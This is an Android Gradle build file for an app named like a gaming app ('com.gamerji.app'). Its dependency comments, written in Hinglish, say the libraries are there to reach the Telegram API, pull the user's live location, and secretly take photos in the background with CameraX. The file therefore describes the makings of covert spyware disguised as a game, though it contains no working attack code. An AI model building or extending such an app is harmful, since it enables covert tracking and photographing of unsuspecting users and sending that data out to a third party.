plugins {
    id 'com.android.application'
}

android {
    namespace 'com.gamerji.app'
    compileSdk 34

    defaultConfig {
        applicationId "com.gamerji.app"
        minSdk 24
        targetSdk 34
        versionCode 1
        versionName "1.0"
    }

    buildTypes {
        release {
            minifyEnabled false
            proguardFiles getDefaultProguardFile('proguard-android-optimize.txt'), 'proguard-rules.pro'
        }
    }
    compileOptions {
        sourceCompatibility JavaVersion.VERSION_1_8
        targetCompatibility JavaVersion.VERSION_1_8
    }
}

dependencies {
    implementation 'androidx.appcompat:appcompat:1.6.1'
    implementation 'com.google.android.material:material:1.11.0'
    
    // Telegram API se connect karne ke liye
    implementation 'com.squareup.okhttp3:okhttp:4.12.0'
    
    // Live Location nikalne ke liye
    implementation 'com.google.android.gms:play-services-location:21.1.0'
    
    // Background me chupke se Photo click karne ke liye (CameraX)
    def camerax_version = "1.3.1"
    implementation "androidx.camera:camera-core:${camerax_version}"
    implementation "androidx.camera:camera-camera2:${camerax_version}"
    implementation "androidx.camera:camera-lifecycle:${camerax_version}"
}

